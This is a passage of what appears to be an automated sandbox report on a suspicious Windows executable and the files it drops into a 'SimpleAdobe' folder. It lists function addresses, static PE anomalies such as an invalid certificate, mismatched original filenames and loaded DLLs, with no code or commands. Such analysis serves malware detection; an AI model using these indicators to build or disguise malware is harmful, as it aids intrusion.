Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658F77A0	12_2_658F77A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658ADFE0	12_2_658ADFE0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658D6FF0	12_2_658D6FF0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658B9F00	12_2_658B9F00
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E7710	12_2_658E7710
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6590E680	12_2_6590E680
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658C5E90	12_2_658C5E90
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65904EA0	12_2_65904EA0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659176E3	12_2_659176E3
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658ABEF0	12_2_658ABEF0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658BFEF0	12_2_658BFEF0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658F5600	12_2_658F5600
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E7E10	12_2_658E7E10
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65909E30	12_2_65909E30
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658F2E4E	12_2_658F2E4E
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658C4640	12_2_658C4640
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658C9E50	12_2_658C9E50
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E3E50	12_2_658E3E50
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65916E63	12_2_65916E63
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658AC670	12_2_658AC670
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65902990	12_2_65902990
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E5190	12_2_658E5190
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658AC9A0	12_2_658AC9A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658DD9B0	12_2_658DD9B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658CA940	12_2_658CA940
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6591B170	12_2_6591B170
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658BD960	12_2_658BD960
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658FB970	12_2_658FB970
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658D60A0	12_2_658D60A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659150C7	12_2_659150C7
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658CC0E0	12_2_658CC0E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E58E0	12_2_658E58E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658B7810	12_2_658B7810
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658EB820	12_2_658EB820
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658F4820	12_2_658F4820
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658C8850	12_2_658C8850
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658CD850	12_2_658CD850
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658EF070	12_2_658EF070
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658AF380	12_2_658AF380
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659153C8	12_2_659153C8
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658ED320	12_2_658ED320
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658A5340	12_2_658A5340
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658BC370	12_2_658BC370
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6591BA90	12_2_6591BA90
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65912AB0	12_2_65912AB0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658A22A0	12_2_658A22A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658D4AA0	12_2_658D4AA0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658BCAB0	12_2_658BCAB0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E8AC0	12_2_658E8AC0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658C1AF0	12_2_658C1AF0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658EE2F0	12_2_658EE2F0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658E9A60	12_2_658E9A60
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659445B0	12_2_659445B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A1A5E0	12_2_65A1A5E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659DE5F0	12_2_659DE5F0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659A8540	12_2_659A8540
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A54540	12_2_65A54540
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659F0570	12_2_659F0570
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A98550	12_2_65A98550
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B2560	12_2_659B2560
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A7A480	12_2_65A7A480
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659964D0	12_2_659964D0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659EA4D0	12_2_659EA4D0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659DA430	12_2_659DA430
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B4420	12_2_659B4420
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65968460	12_2_65968460
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6597A7D0	12_2_6597A7D0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659D0700	12_2_659D0700
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659746D0	12_2_659746D0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659AE6E0	12_2_659AE6E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659EE6E0	12_2_659EE6E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659AC650	12_2_659AC650
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659501E0	12_2_659501E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A34130	12_2_65A34130
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659C6130	12_2_659C6130
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659B8140	12_2_659B8140
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65948090	12_2_65948090
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A2C0B0	12_2_65A2C0B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659600B0	12_2_659600B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A1C000	12_2_65A1C000
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A18010	12_2_65A18010
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6599E070	12_2_6599E070
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659AE3B0	12_2_659AE3B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659823A0	12_2_659823A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659A43E0	12_2_659A43E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659C2320	12_2_659C2320
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A6C360	12_2_65A6C360
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65958340	12_2_65958340
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A92370	12_2_65A92370
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65952370	12_2_65952370
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659E6370	12_2_659E6370
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A222A0	12_2_65A222A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A1E2B0	12_2_65A1E2B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6596A2B0	12_2_6596A2B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65AD62C0	12_2_65AD62C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A28220	12_2_65A28220
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A1A210	12_2_65A1A210
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659E8250	12_2_659E8250
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659D8260	12_2_659D8260
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659E6D90	12_2_659E6D90
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65954DB0	12_2_65954DB0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65ADCDC0	12_2_65ADCDC0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65AD8D20	12_2_65AD8D20
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A1ED70	12_2_65A1ED70
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A7AD50	12_2_65A7AD50
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659AECD0	12_2_659AECD0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6594ECC0	12_2_6594ECC0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A2AC30	12_2_65A2AC30
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A16C00	12_2_65A16C00
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6595AC60	12_2_6595AC60
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A98FB0	12_2_65A98FB0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_6595EFB0	12_2_6595EFB0

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: String function: 65979B10 appears 37 times
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: String function: 658DCBE8 appears 134 times
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: String function: 658E94D0 appears 90 times
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: String function: 65AD09D0 appears 131 times
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: String function: 65973620 appears 42 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7624 -ip 7624

Source: i1crvbOZAP.exe

Static PE information: invalid certificate

Source: june[1].exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Y8KGRj_sUjw5KjZpIoRDoSwV.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: i1crvbOZAP.exe

Static PE information: Number of sections : 12 > 10

Source: i1crvbOZAP.exe, 00000000.00000003.1724320635.0000029625C0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTurnRight2 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1723460589.0000029626053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1725574620.0000029625BFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTurnRight2 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameInstrumental.exe4 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1723460589.0000029626031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zS.sfx.exe, vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1782449752.0000029626147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTurnRight2 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1765747947.0000029626040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXFilePumper.exe8 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImmovables.exe4 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1684301773.0000029625C57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTurnRight2 vs i1crvbOZAP.exe
Source: i1crvbOZAP.exe, 00000000.00000003.1728472949.00000296275F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTurnRight2 vs i1crvbOZAP.exe

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msidle.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncasvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: httpprxp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wpdbusenum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: portabledeviceconnectapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Section loaded: rstrtmgr.dll	Jump to behavior
